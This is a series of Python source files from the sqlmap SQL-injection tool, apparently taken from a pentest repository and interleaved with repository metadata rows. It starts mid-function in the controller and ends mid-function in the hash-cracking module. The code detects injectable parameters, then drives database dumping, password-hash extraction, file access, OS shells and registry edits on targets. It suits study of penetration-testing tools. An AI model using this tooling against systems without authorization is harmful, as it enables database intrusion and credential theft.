any([conf.data, conf.testParameter]): for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]): paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0]) if paramKey not in kb.testedParams: testSqlInj = True break else: paramKey = (conf.hostname, conf.path, None, None) if 
paramKey not in kb.testedParams: testSqlInj = True if testSqlInj and conf.hostname in kb.vulnHosts: if kb.skipVulnHost is None: message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' testSqlInj = not kb.skipVulnHost if not testSqlInj: infoMsg = "skipping '%s'" % targetUrl logger.info(infoMsg) continue if conf.multipleTargets: hostCount += 1 if conf.forms: message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl) else: message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "") if conf.cookie: message += "\nCookie: %s" % conf.cookie if conf.data is not None: message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else "" if conf.forms: if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1: continue message += "\ndo you want to test this form? [Y/n/q] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): if conf.method == HTTPMETHOD.POST: message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) conf.data = _randomFillBlankFields(conf.data) conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data elif conf.method == HTTPMETHOD.GET: if targetUrl.find("?") > -1: firstPart = targetUrl[:targetUrl.find("?")] secondPart = targetUrl[targetUrl.find("?") + 1:] message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) conf.url = "%s?%s" % (firstPart, test) parseTargetUrl() elif test[0] in ("n", "N"): continue elif test[0] in ("q", "Q"): break else: message += "\ndo you want to test this URL? 
[Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): dataToStdout(os.linesep) continue elif test[0] in ("q", "Q"): break infoMsg = "testing URL '%s'" % targetUrl logger.info(infoMsg) setupTargetEnv() if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): continue if conf.checkWaf: checkWaf() if conf.identifyWaf: identifyWaf() if conf.nullConnection: checkNullConnection() if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ and (kb.injection.place is None or kb.injection.parameter is None): if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: # NOTE: this is not needed anymore, leaving only to display # a warning message to the user in case the page is not stable checkStability() # Do a little prioritization reorder of a testable parameter list parameters = conf.parameters.keys() # Order of testing list (first to last) orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET) for place in orderList[::-1]: if place in parameters: parameters.remove(place) parameters.insert(0, place) proceed = True for place in parameters: # Test User-Agent and Referer headers only if # --level >= 3 skip = (place == PLACE.USER_AGENT and conf.level < 3) skip |= (place == PLACE.REFERER and conf.level < 3) # Test Host header only if # --level >= 5 skip |= (place == PLACE.HOST and conf.level < 5) # Test Cookie header only if --level >= 2 skip |= (place == PLACE.COOKIE and conf.level < 2) skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True)) if skip: continue if place not in conf.paramDict: continue paramDict = conf.paramDict[place] for parameter, value in paramDict.items(): if not proceed: break kb.vainRun = False testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) if paramKey in kb.testedParams: testSqlInj = False infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter in conf.testParameter: pass elif parameter == conf.rParam: testSqlInj = False infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter in conf.skip: testSqlInj = False infoMsg = "skipping %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif parameter == conf.csrfToken: testSqlInj = False infoMsg = "skipping CSRF protection token parameter '%s'" % parameter logger.info(infoMsg) # Ignore session-like parameters for --level < 4 elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): testSqlInj = False infoMsg = "ignoring %s parameter '%s'" % (place, parameter) logger.info(infoMsg) elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: check = checkDynParam(place, parameter, value) if not check: warnMsg = "%s parameter 
'%s' does not appear dynamic" % (place, parameter) logger.warn(warnMsg) else: infoMsg = "%s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) if testSqlInj: check = heuristicCheckSqlInjection(place, parameter) if check != HEURISTIC_TEST.POSITIVE: if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED): infoMsg = "skipping %s parameter '%s'" % (place, parameter) logger.info(infoMsg) continue infoMsg = "testing for SQL injection on %s " % place infoMsg += "parameter '%s'" % parameter logger.info(infoMsg) injection = checkSqlInjection(place, parameter, value) proceed = not kb.endDetection if injection is not None and injection.place is not None: kb.injections.append(injection) # In case when user wants to end detection phase (Ctrl+C) if not proceed: break msg = "%s parameter '%s' " % (injection.place, injection.parameter) msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " test = readInput(msg, default="N") if test[0] not in ("y", "Y"): proceed = False paramKey = (conf.hostname, conf.path, None, None) kb.testedParams.add(paramKey) else: warnMsg = "%s parameter '%s' is not " % (place, parameter) warnMsg += "injectable" logger.warn(warnMsg) if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None): if kb.vainRun and not conf.multipleTargets: errMsg = "no parameter(s) found for testing in the provided data " errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" raise SqlmapNoneDataException(errMsg) else: errMsg = "all tested parameters appear to be not injectable." if conf.level < 5 or conf.risk < 3: errMsg += " Try to increase '--level'/'--risk' values " errMsg += "to perform more tests." if isinstance(conf.tech, list) and len(conf.tech) < 5: errMsg += " Rerun without providing the option '--technique'." if not conf.textOnly and kb.originalPage: percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage)) if kb.dynamicMarkings: errMsg += " You can give it a go with the switch '--text-only' " errMsg += "if the target page has a low percentage " errMsg += "of textual content (~%.2f%% of " % percent errMsg += "page content is text)." elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone: errMsg += " Please retry with the switch '--text-only' " errMsg += "(along with --technique=BU) as this case " errMsg += "looks like a perfect candidate " errMsg += "(low textual content along with inability " errMsg += "of comparison engine to detect at least " errMsg += "one dynamic parameter)." if kb.heuristicTest == HEURISTIC_TEST.POSITIVE: errMsg += " As heuristic test turned out positive you are " errMsg += "strongly advised to continue on with the tests. " errMsg += "Please, consider usage of tampering scripts as " errMsg += "your target might filter the queries." 
if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " errMsg += "(or '--regexp')" elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " errMsg += "exclusively True responses" elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " errMsg += "does not match exclusively True responses" raise SqlmapNotVulnerableException(errMsg) else: # Flush the flag kb.testMode = False _saveToResultsFile() _saveToHashDB() _showInjections() _selectInjection() if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " exploit = readInput(message, default="Y") condition = not exploit or exploit[0] in ("y", "Y") else: condition = True if condition: action() except KeyboardInterrupt: if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" logger.warn(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): return False elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: raise except SqlmapUserQuitException: raise except SqlmapSilentQuitException: raise except SqlmapBaseException, ex: errMsg = getUnicode(ex.message) if conf.multipleTargets: errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") logger.error(errMsg) else: logger.critical(errMsg) return False finally: showHttpErrorCodes() if kb.maxConnectionsFlag: warnMsg = "it appears that the target " warnMsg += "has a maximum connections " warnMsg += "constraint" logger.warn(warnMsg) if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) if conf.multipleTargets and conf.resultsFilename: infoMsg = "you can find results of scanning in multiple targets " infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename logger.info(infoMsg) return True
27,843
Python
.py
512
38.705078
239
0.555098
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
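start() in controller.py reorders the places to test by walking a fixed priority tuple backwards and re-inserting each match at the front of the list, so the first entry of the tuple ends up tested first. The same idiom, reduced to a self-contained sketch with illustrative place names:

# priority reordering idiom from start(); ORDER values are illustrative
ORDER = ("CUSTOM_POST", "CUSTOM_HEADER", "URI", "POST", "GET")

def prioritize(parameters, order=ORDER):
    parameters = list(parameters)
    # walking the priority tuple in reverse leaves the highest-priority
    # place at index 0 after the final insert(0, ...)
    for place in order[::-1]:
        if place in parameters:
            parameters.remove(place)
            parameters.insert(0, place)
    return parameters

print(prioritize(["Cookie", "GET", "POST"]))  # ['POST', 'GET', 'Cookie']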
18,975
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,976
action.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/action.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.controller.handler import setHandler
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import CONTENT_TYPE
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists

def action():
    """
    This function exploits the SQL injection on the affected
    URL parameter and extracts requested data from the back-end
    database management system or operating system if possible
    """

    # First of all we have to identify the back-end database management
    # system to be able to go ahead with the injection
    setHandler()

    if not Backend.getDbms() or not conf.dbmsHandler:
        htmlParsed = Format.getErrorParsedDBMSes()

        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"

        if htmlParsed:
            errMsg += ", but from the HTML error page it was "
            errMsg += "possible to determine that the "
            errMsg += "back-end DBMS is %s" % htmlParsed

        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
        else:
            errMsg += ". Support for this DBMS will be implemented at "
            errMsg += "some point"

        raise SqlmapUnsupportedDBMSException(errMsg)

    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())

    # Enumeration options
    if conf.getBanner:
        conf.dumper.banner(conf.dbmsHandler.getBanner())

    if conf.getCurrentUser:
        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())

    if conf.getCurrentDb:
        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())

    if conf.getHostname:
        conf.dumper.hostname(conf.dbmsHandler.getHostname())

    if conf.isDba:
        conf.dumper.dba(conf.dbmsHandler.isDba())

    if conf.getUsers:
        conf.dumper.users(conf.dbmsHandler.getUsers())

    if conf.getPasswordHashes:
        try:
            conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise

    if conf.getPrivileges:
        try:
            conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise

    if conf.getRoles:
        try:
            conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise

    if conf.getDbs:
        conf.dumper.dbs(conf.dbmsHandler.getDbs())

    if conf.getTables:
        conf.dumper.dbTables(conf.dbmsHandler.getTables())

    if conf.commonTables:
        conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))

    if conf.getSchema:
        conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)

    if conf.getColumns:
        conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)

    if conf.getCount:
        conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())

    if conf.commonColumns:
        conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))

    if conf.dumpTable:
        conf.dbmsHandler.dumpTable()

    if conf.dumpAll:
        conf.dbmsHandler.dumpAll()

    if conf.search:
        conf.dbmsHandler.search()

    if conf.query:
        conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))

    if conf.sqlShell:
        conf.dbmsHandler.sqlShell()

    if conf.sqlFile:
        conf.dbmsHandler.sqlFile()

    # User-defined function options
    if conf.udfInject:
        conf.dbmsHandler.udfInjectCustom()

    # File system options
    if conf.rFile:
        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))

    if conf.wFile:
        conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)

    # Operating system options
    if conf.osCmd:
        conf.dbmsHandler.osCmd()

    if conf.osShell:
        conf.dbmsHandler.osShell()

    if conf.osPwn:
        conf.dbmsHandler.osPwn()

    if conf.osSmb:
        conf.dbmsHandler.osSmb()

    if conf.osBof:
        conf.dbmsHandler.osBof()

    # Windows registry options
    if conf.regRead:
        conf.dumper.registerValue(conf.dbmsHandler.regRead())

    if conf.regAdd:
        conf.dbmsHandler.regAdd()

    if conf.regDel:
        conf.dbmsHandler.regDel()

    # Miscellaneous options
    if conf.cleanup:
        conf.dbmsHandler.cleanup()

    if conf.direct:
        conf.dbmsConnector.close()
5,674
Python
.py
141
32.368794
114
0.685131
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
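action() above is in essence a flat dispatch table: each enumeration flag on conf triggers exactly one handler call, evaluated in a fixed order. A compact sketch of the same pattern, using hypothetical flag names and a dummy handler rather than sqlmap's real conf/dbmsHandler objects:

class DummyHandler(object):
    # hypothetical stand-in for conf.dbmsHandler
    def getBanner(self):
        return "ExampleDB 1.0"

    def getCurrentUser(self):
        return "admin"

def run_actions(flags, handler):
    # (flag, callable) pairs checked in order, mirroring action()
    dispatch = (
        ("get_banner", handler.getBanner),
        ("get_current_user", handler.getCurrentUser),
    )
    for name, method in dispatch:
        if flags.get(name):
            print("%s: %s" % (name, method()))

run_actions({"get_banner": True}, DummyHandler())  # prints the banner only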
18,977
handler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/handler.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import Backend
from lib.core.data import conf
from lib.core.data import logger
from lib.core.dicts import DBMS_DICT
from lib.core.enums import DBMS
from lib.core.settings import MSSQL_ALIASES
from lib.core.settings import MYSQL_ALIASES
from lib.core.settings import ORACLE_ALIASES
from lib.core.settings import PGSQL_ALIASES
from lib.core.settings import SQLITE_ALIASES
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap
from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
from plugins.dbms.mysql import MySQLMap
from plugins.dbms.mysql.connector import Connector as MySQLConn
from plugins.dbms.oracle import OracleMap
from plugins.dbms.oracle.connector import Connector as OracleConn
from plugins.dbms.postgresql import PostgreSQLMap
from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn
from plugins.dbms.sqlite import SQLiteMap
from plugins.dbms.sqlite.connector import Connector as SQLiteConn
from plugins.dbms.access import AccessMap
from plugins.dbms.access.connector import Connector as AccessConn
from plugins.dbms.firebird import FirebirdMap
from plugins.dbms.firebird.connector import Connector as FirebirdConn
from plugins.dbms.maxdb import MaxDBMap
from plugins.dbms.maxdb.connector import Connector as MaxDBConn
from plugins.dbms.sybase import SybaseMap
from plugins.dbms.sybase.connector import Connector as SybaseConn
from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsqldb import HSQLDBMap
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn

def setHandler():
    """
    Detects which back-end database management system the target
    web application is using and sets the matching handler.
    """

    items = [
        (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
        (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
        (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
        (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
        (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
        (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
        (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
        (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
        (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
        (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
        (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
    ]

    # If the back-end DBMS has already been identified, move its entry
    # to the front of the list so it gets tested first
    _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
    if _:
        items.remove(_)
        items.insert(0, _)

    for dbms, aliases, Handler, Connector in items:
        if conf.dbms and conf.dbms.lower() != dbms.lower():
            debugMsg = "skipping test for %s" % dbms
            logger.debug(debugMsg)
            continue

        handler = Handler()
        conf.dbmsConnector = Connector()

        if conf.direct:
            logger.debug("forcing timeout to 10 seconds")
            conf.timeout = 10

            dialect = DBMS_DICT[dbms][3]

            if dialect:
                sqlalchemy = SQLAlchemy(dialect=dialect)
                sqlalchemy.connect()

                if sqlalchemy.connector:
                    conf.dbmsConnector = sqlalchemy
                else:
                    conf.dbmsConnector.connect()
            else:
                conf.dbmsConnector.connect()

        if handler.checkDbms():
            conf.dbmsHandler = handler
            break
        else:
            conf.dbmsConnector = None

    # At this point back-end DBMS is correctly fingerprinted, no need
    # to enforce it anymore
    Backend.flushForcedDbms()
4,229
Python
.py
94
37.776596
94
0.714147
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
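setHandler() above promotes an already-identified DBMS with a Python 2 ordering quirk: max() over a generator that yields either a matching (dbms, aliases, ...) tuple or None, relying on None comparing lower than any tuple. A small sketch of just that expression, with made-up items:

# Python 2 only: None sorts below any tuple, so max() yields the
# matching item, or None when nothing matches
items = [("mysql", ("mysql", "mariadb")), ("pgsql", ("postgres", "pgsql"))]
identified = "mariadb"

match = max(item if identified in item[1] else None for item in items)
print(match)  # ('mysql', ('mysql', 'mariadb'))

# under Python 3 the same expression raises TypeError, because None
# and tuples are no longer orderable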
18,978
hashdb.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/hashdb.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import hashlib
import os
import sqlite3
import threading
import time

from lib.core.common import getUnicode
from lib.core.common import serializeObject
from lib.core.common import unserializeObject
from lib.core.data import logger
from lib.core.exception import SqlmapDataException
from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES
from lib.core.settings import HASHDB_FLUSH_RETRIES
from lib.core.settings import HASHDB_FLUSH_THRESHOLD
from lib.core.settings import UNICODE_ENCODING
from lib.core.threads import getCurrentThreadData
from lib.core.threads import getCurrentThreadName

class HashDB(object):
    def __init__(self, filepath):
        self.filepath = filepath
        self._write_cache = {}
        self._cache_lock = threading.Lock()

    def _get_cursor(self):
        threadData = getCurrentThreadData()

        if threadData.hashDBCursor is None:
            try:
                connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None)
                threadData.hashDBCursor = connection.cursor()
                threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)")
            except Exception, ex:
                errMsg = "error occurred while opening a session "
                errMsg += "file '%s' ('%s')" % (self.filepath, ex)
                raise SqlmapDataException(errMsg)

        return threadData.hashDBCursor

    def _set_cursor(self, cursor):
        threadData = getCurrentThreadData()
        threadData.hashDBCursor = cursor

    cursor = property(_get_cursor, _set_cursor)

    def close(self):
        threadData = getCurrentThreadData()
        try:
            if threadData.hashDBCursor:
                threadData.hashDBCursor.close()
                threadData.hashDBCursor.connection.close()
                threadData.hashDBCursor = None
        except:
            pass

    @staticmethod
    def hashKey(key):
        key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
        retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
        return retVal

    def retrieve(self, key, unserialize=False):
        retVal = None

        if key and (self._write_cache or os.path.isfile(self.filepath)):
            hash_ = HashDB.hashKey(key)
            retVal = self._write_cache.get(hash_)

            if not retVal:
                while True:
                    try:
                        for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)):
                            retVal = row[0]
                    except sqlite3.OperationalError, ex:
                        if 'locked' not in ex.message:
                            raise
                    else:
                        break

        return retVal if not unserialize else unserializeObject(retVal)

    def write(self, key, value, serialize=False):
        if key:
            hash_ = HashDB.hashKey(key)
            self._cache_lock.acquire()
            self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)
            self._cache_lock.release()

        if getCurrentThreadName() in ('0', 'MainThread'):
            self.flush()

    def flush(self, forced=False):
        if not self._write_cache:
            return

        if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD:
            return

        self._cache_lock.acquire()
        _ = self._write_cache
        self._write_cache = {}
        self._cache_lock.release()

        try:
            self.beginTransaction()
            for hash_, value in _.items():
                retries = 0
                while True:
                    try:
                        try:
                            self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,))
                        except sqlite3.IntegrityError:
                            self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,))
                    except sqlite3.DatabaseError, ex:
                        if not os.path.exists(self.filepath):
                            debugMsg = "session file '%s' does not exist" % self.filepath
                            logger.debug(debugMsg)
                            break

                        if retries == 0:
                            warnMsg = "there has been a problem while writing to "
                            warnMsg += "the session file ('%s')" % ex.message
                            logger.warn(warnMsg)

                        if retries >= HASHDB_FLUSH_RETRIES:
                            return
                        else:
                            retries += 1
                            time.sleep(1)
                    else:
                        break
        finally:
            self.endTransaction()

    def beginTransaction(self):
        threadData = getCurrentThreadData()
        if not threadData.inTransaction:
            self.cursor.execute("BEGIN TRANSACTION")
            threadData.inTransaction = True

    def endTransaction(self):
        threadData = getCurrentThreadData()
        if threadData.inTransaction:
            retries = 0
            while retries < HASHDB_END_TRANSACTION_RETRIES:
                try:
                    self.cursor.execute("END TRANSACTION")
                    threadData.inTransaction = False
                except sqlite3.OperationalError:
                    pass
                else:
                    return

                retries += 1
                time.sleep(1)

            try:
                self.cursor.execute("ROLLBACK TRANSACTION")
            except sqlite3.OperationalError:
                self.cursor.close()
                self.cursor = None
            finally:
                threadData.inTransaction = False
6,001
Python
.py
143
28.741259
122
0.564278
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
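HashDB.hashKey() above maps an arbitrary key onto a SQLite INTEGER PRIMARY KEY by taking the first 12 hex digits (48 bits) of the key's MD5 digest and parsing them as an integer. The derivation in isolation, assuming sqlmap's UNICODE_ENCODING constant is 'utf8':

import hashlib

def hash_key(key):
    # same derivation as HashDB.hashKey(): first 48 bits of the MD5
    # digest, used as the integer row id in the storage table
    key = key.encode("utf8") if isinstance(key, unicode) else repr(key)
    return int(hashlib.md5(key).hexdigest()[:12], 16)

print(hash_key(u"example.com/index.php?id=1"))  # deterministic 48-bit id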
18,979
hash.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/hash.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ try: from crypt import crypt except ImportError: from thirdparty.fcrypt.fcrypt import crypt _multiprocessing = None try: import multiprocessing # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) _ = multiprocessing.Queue() except (ImportError, OSError): pass else: _multiprocessing = multiprocessing import gc import os import re import tempfile import time from hashlib import md5 from hashlib import sha1 from hashlib import sha224 from hashlib import sha384 from hashlib import sha512 from Queue import Queue from lib.core.common import Backend from lib.core.common import checkFile from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import normalizeUnicode from lib.core.common import paths from lib.core.common import readInput from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.convert import hexdecode from lib.core.convert import hexencode from lib.core.convert import utf8encode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASH from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import DUMMY_USER_PREFIX from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD from lib.core.settings import IS_WIN from lib.core.settings import ITOA64 from lib.core.settings import ML from lib.core.settings import NULL from lib.core.settings import UNICODE_ENCODING from lib.core.settings import ROTATING_CHARS from lib.core.wordlist import Wordlist from thirdparty.pydes.pyDes import des from thirdparty.pydes.pyDes import CBC def mysql_passwd(password, uppercase=True): """ Reference(s): http://csl.sublevel3.org/mysql-password-function/ >>> mysql_passwd(password='testpass', uppercase=True) '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' """ retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() return retVal.upper() if uppercase else retVal.lower() def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' """ Reference(s): http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html >>> mysql_old_passwd(password='testpass', uppercase=True) '7DCDA0D57290B453' """ a, b, c = 1345345333, 7, 0x12345671 for d in password: if d == ' ' or d == '\t': continue e = ord(d) a ^= (((a & 63) + b) * e) + (a << 8) c += (c << 8) ^ a b += e retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1)) return retVal.upper() if uppercase else retVal.lower() def postgres_passwd(password, username, uppercase=False): """ Reference(s): http://pentestmonkey.net/blog/cracking-postgres-hashes/ >>> postgres_passwd(password='testpass', username='testuser', uppercase=False) 'md599e5ea7a6f7c3269995cba3927fd0093' """ retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if 
